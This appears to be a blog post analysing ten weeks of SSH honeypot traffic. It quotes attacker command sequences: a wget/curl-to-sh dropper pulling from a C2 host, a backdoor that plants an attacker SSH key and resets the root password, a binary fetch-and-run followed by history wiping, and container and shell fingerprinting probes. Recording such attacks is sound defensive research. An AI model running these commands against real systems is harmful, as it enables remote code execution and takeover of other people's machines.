2026-05-13 11:00pm
Ten weeks into running the honeypot and things have gotten more interesting. The previous post covered the redtail cryptominer - this one covers what else showed up, and some evolution of redtail itself.
The same automated dropper (I'll call it RedtailBot) has not stopped. It has been hitting the honeypot every few hours since early March, and as of today is still going. The interesting part is watching its C2 server rotate - I'm just calling them C2-A through C2-E:
| Period | C2 |
|---|---|
| March 2 - March 4 | C2-A |
| March 5 - April 4 | C2-B |
| April 5 - April 27 | C2-C |
| April 21 - April 28 | C2-D (overlap with C2-C) |
| April 28 - April 30 | C2-E |
| May 1 - May 13 | C2-F |
Every session from RedtailBot is the same one-liner:
uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://[C2]/sh || curl -sk https://[C2]/sh) | sh -s ssh
The hex in there decodes to auth_ok - so the bot is echoing a confirmation string back to whatever is listening. Since the honeypot has sh removed/broken, every attempt fails at the pipe stage with -bash: sh: command not found. It just keeps trying anyway.
At roughly 3-4 hits per day across 10+ weeks, that's somewhere around 300+ failed infection attempts from this one bot alone.
Starting March 24 and still showing up as late as May 1, a different campaign has been hitting the honeypot with a very manual-feeling sequence. I'll call the operator MdrfckrCrew after the comment in their SSH key:
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">> .ssh/authorized_keys && chmod -R go= ~/.ssh
echo "root:[randompassword]"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
After establishing the backdoor it does a fairly thorough system survey - CPU model, RAM, disk, number of CPU cores, uptime, w, uname -m. Classic "is this machine worth keeping?" reconnaissance.
The same SSH public key with the comment mdrfckr shows up from three different source IPs spread across three different countries over about six weeks, which suggests this is a coordinated botnet with a shared key that gets dropped onto every new box. The password changes are different each time (e.g. m9Nj0SJj1Qjj, 1WODHU9OOXSH, hg28pZIb3Kbg), probably generated per-session.
The lockr command (alongside chattr) is worth noting - it's trying multiple anti-immutable-flag tools in case one isn't available. chattr is the standard Linux one but lockr isn't a standard tool - so either it's a custom binary or they're just throwing both at the wall.
Early April, several sessions I'll group as SysMonitorCrew started running a fingerprinting sequence followed by trying to download something to ~/.sysmonitor from a C2 I'll call SM-C2:
uname -s -v -n -r -m
nproc
uptime -p | awk '...'
awk -F: '/model name|Processor/ {gsub(/^ +/, "", $2); print $2; exit}' /proc/cpuinfo
curl -s https://ipinfo.io/org || wget -qO- https://ipinfo.io/org || ...
nvidia-smi -q | grep "Product Name" ...
nvidia-smi -q | grep "Attached GPUs" ...
curl -sSL http://[SM-C2]/[token] -o ~/.sysmonitor || wget -qO ~/.sysmonitor http://[SM-C2]/[token] || ...
chmod +x ~/.sysmonitor && ~/.sysmonitor && history -c && history -w
A few things stand out here. First, the nvidia-smi calls - this campaign is specifically GPU hunting. It checks both Product Name and Attached GPUs counts, so it's doing a proper survey before deciding what to drop. Second, the ISP lookup via ipinfo.io/org - probably filtering out residential connections or cloud providers it already has coverage on. Third, the history -c && history -w at the end to wipe bash history after running.
The binary URL has a long random-looking token path which is probably just obscurity rather than real security - but it does mean you can't accidentally stumble on it. The honeypot doesn't make outbound connections in real time, but URLs seen in sessions get queued and fetched separately at random intervals post-session - so the binary may already be sitting in storage, just not analyzed yet. Given the GPU focus, GPU-accelerated mining (or possibly a cryptostealer that targets GPU memory) seems the likely payload.
The same SM-C2 shows up across three different sessions from different source IPs on April 3-4, suggesting a coordinated campaign.
Starting April 17, a persistent source I'll call ContainerProber began hammering the honeypot with the same command over and over:
echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
This ran for weeks - multiple times per day up through early May. What's interesting about this one is what it's actually checking for. Reading /proc/1/mounts and listing /proc/1/ is a standard container escape detection technique - if you're inside a Docker container, PID 1 won't be systemd and /proc/1/mounts will show overlay filesystems. The curl2 in there is probably a typo or a test binary it's looking for.
Starting in May, a cluster of Tor exit nodes started running a similar but slightly different variant:
echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778084668565428669" | sh
The big number at the end changes every session - it looks like a session/tracking ID embedded in the payload. These are almost certainly separate operators from ContainerProber, but the same underlying goal: find containers with misconfigured host mounts or namespace leaks.
My honeypot exposes a fake /proc with limited entries, which is apparently convincing enough that they keep coming back.
Three separate sessions (I'll call them ELFProbe) hit the honeypot with a very simple probe:
echo 1 && cat /bin/echo
The output in a real Linux system starts with ELF\x02\x01\x01 - so they're checking the ELF magic bytes to confirm they're actually on a Linux system and not some kind of fake/emulated environment. The honeypot faithfully serves back 1\nELF\x02\x01\x01\x00 and they seem satisfied with that.
One session also did:
echo 1 > /dev/null && cat /bin/echo
Which is basically the same thing but also checking that /dev/null behaves correctly. Shell capability probing getting more thorough over time.
One session I'll call MegaScan ran the most comprehensive single-command fingerprint I've seen so far, all in one shot:
cat /proc/cpuinfo; echo ___SEP___; echo $((1337+1337)); echo ___SEP___; mount; echo ___SEP___; uname -a; echo ___SEP___; ls -la /; echo ___SEP___; whoami; echo ___SEP___; cat /etc/issue; echo ___SEP___; ps -ef; echo ___SEP___; free -m; echo ___SEP___; hostname
The $((1337+1337)) is a shell arithmetic test - if it outputs 2674 the shell is functional, if it outputs the literal string $((1337+1337)) it's a dumb shell or fake environment. The session lasted nearly 19 hours - kept open the whole time, probably waiting for a result that never came back to whoever was watching.
After ten weeks, the pattern is roughly: this honeypot IP gets picked up by mass scanners within hours, and then sits on multiple different botnet target lists simultaneously. The traffic breaks down into a few categories:
The infrastructure this thing is sitting on has a hostname that looks like a legitimate mail server - seems to be enough misdirection that at least some automated tools don't immediately filter it out.
Still watching. Will post again if anything interesting evolves.